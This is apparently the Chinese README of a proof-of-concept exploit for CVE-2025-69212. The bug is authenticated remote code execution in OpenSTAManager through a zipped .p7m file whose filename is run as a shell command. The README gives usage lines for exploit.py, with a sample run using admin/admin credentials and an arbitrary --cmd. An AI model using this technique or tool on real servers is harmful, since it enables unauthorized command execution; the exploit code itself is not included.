
CVE-2025-69212 Proof-of-concept.
OpenSTAManager 是一款用于技术支持、电子发票和会计的管理软件解决方案。版本 <=2.9.8 存在一个经过身份验证的远程代码执行漏洞。攻击者可以通过上传一个特制的包含 .p7m 文件的 .zip 压缩包来利用此漏洞,该 .p7m 文件的文件名可被解释为 shell 命令,从而导致在远程服务器上执行任意命令。
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
示例:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help show this help message and exit
--user USER username for auth.
--password PASSWORD password for auth.
--target TARGET target domain endpoint
--cmd CMD command to execute on the server